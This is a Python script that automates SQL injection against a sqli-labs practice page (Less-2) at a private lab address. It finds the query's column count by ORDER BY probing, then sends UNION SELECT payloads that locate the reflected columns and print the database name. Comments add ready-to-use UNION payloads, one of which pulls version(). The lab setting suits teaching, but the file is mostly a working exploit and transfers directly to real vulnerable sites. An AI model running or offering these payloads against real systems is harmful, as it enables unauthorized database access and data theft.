import requests
import string

# Reference UNION probe for once the column count is known (string-context
# variant with a closing quote; the functions below send quoteless payloads):
#   ?id=1' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,1

# Lab target: base URL of the vulnerable page, no query string.
url = "http://192.168.31.203/sqli-labs-master1/Less-2/"
# Quote followed by a space; not referenced by the functions in this file.
special_char = "' "
# Printable ASCII without whitespace — identical to string.printable.strip().
char_set = string.digits + string.ascii_letters + string.punctuation


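def get_column_num(url: str, max_columns: int = 1000, timeout: float = 10) -> int:
    """Find the column count of the injected SELECT by ORDER BY probing.

    Sends ``id=1 and 1=2 order by N`` for N = 1, 2, ... and stops at the
    first N whose response contains MySQL's ``Unknown column`` error; N-1 is
    then the number of columns the original query returns, which any UNION
    payload must match.

    Args:
        url: Base URL of the vulnerable page, without a query string.
        max_columns: Exclusive upper bound on N. The original looped to 1000
            and on exhaustion silently returned 998, which then produced a
            nonsensical 998-column UNION downstream.
        timeout: Per-request timeout in seconds; without one a stalled
            target hangs the whole scan.

    Returns:
        The column count. 0 means even ``order by 1`` errored, which usually
        indicates a wrong injection point or error signature.

    Raises:
        RuntimeError: no ``Unknown column`` error within ``max_columns``
            probes — typically the target does not echo MySQL errors, and
            ORDER BY probing cannot work without them.
    """
    for i in range(1, max_columns):
        # Pass the payload via params so requests percent-encodes it
        # (spaces become '+'); the server-side decoding restores the
        # plain text that reaches MySQL.
        response = requests.get(
            url, params={"id": f"1 and 1=2 order by {i}"}, timeout=timeout
        )
        print(response.url)
        if "Unknown column" in response.text:
            return i - 1
    raise RuntimeError(
        f"no 'Unknown column' error after {max_columns - 1} probes; "
        "the target may not display MySQL errors"
    )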


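def get_databaseName(url: str, column: int, timeout: float = 10) -> str:
    """Locate the UNION columns the page echoes and put database() there.

    Two requests are sent. The first is a UNION SELECT of distinct numeric
    sentinels (1000001, 1000002, ...) to learn which column positions are
    reflected in the response. The second repeats the UNION with
    ``database()`` in every reflected position so the page prints the
    current schema name; the response is printed and returned, and pulling
    the name out of the HTML is left to the caller since the page layout is
    lesson-specific.

    The sentinels replace the plain ``1,2,3`` of the first version, whose
    ``str(i) in res`` check matched single digits that occur in almost any
    HTML page and so reported every column as reflected (the result was then
    never used). Equal-length seven-digit values cannot be substrings of one
    another and are unlikely to occur in a page by accident. When no
    position is detected, every column is filled with ``database()`` as a
    fallback, which is what the first version always did.

    Args:
        url: Base URL of the vulnerable page, without a query string.
        column: Column count of the original query (see get_column_num).
        timeout: Per-request timeout in seconds.

    Returns:
        The response text of the ``database()`` request.

    Raises:
        ValueError: ``column`` is below 1 (a UNION needs at least one
            column; 0 is what get_column_num reports on a failed probe).
    """
    if column < 1:
        raise ValueError(f"column must be >= 1, got {column}")

    sentinel_base = 1_000_000
    sentinels = [str(sentinel_base + i) for i in range(1, column + 1)]

    # Probe request: find which positions the page reflects.
    probe = "1 and 1=2 union select " + ",".join(sentinels)
    response = requests.get(url, params={"id": probe}, timeout=timeout)
    print(response.url)
    res = response.text
    reflected = [i for i, s in enumerate(sentinels, start=1) if s in res]
    print(f"[+] Reflected column positions: {reflected}")

    # Fill the reflected positions with database(); keep the sentinel in
    # the others so the UNION column count still matches.
    if reflected:
        values = [
            "database()" if i in reflected else s
            for i, s in enumerate(sentinels, start=1)
        ]
    else:
        print("[-] No reflected column found; filling every column with database()")
        values = ["database()"] * column

    payload = "1 and 1=2 union select " + ",".join(values)
    response = requests.get(url, params={"id": payload}, timeout=timeout)
    print(response.url)
    res = response.text
    print(res)
    return res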

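# Guard the scan so importing this module (e.g. to reuse the helpers) does
# not fire requests at the lab target as a side effect.
if __name__ == "__main__":
    column_num = get_column_num(url)
    print(f"[+] The length of column: {column_num}")
    get_databaseName(url, column_num)

# Manual follow-up once the reflected positions are known, e.g. for Less-2
# where columns 2 and 3 are the ones to fill:
#   http://192.168.31.203/sqli-labs-master1/Less-2/?id=1 and 1=2 union select 1,database(),version()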
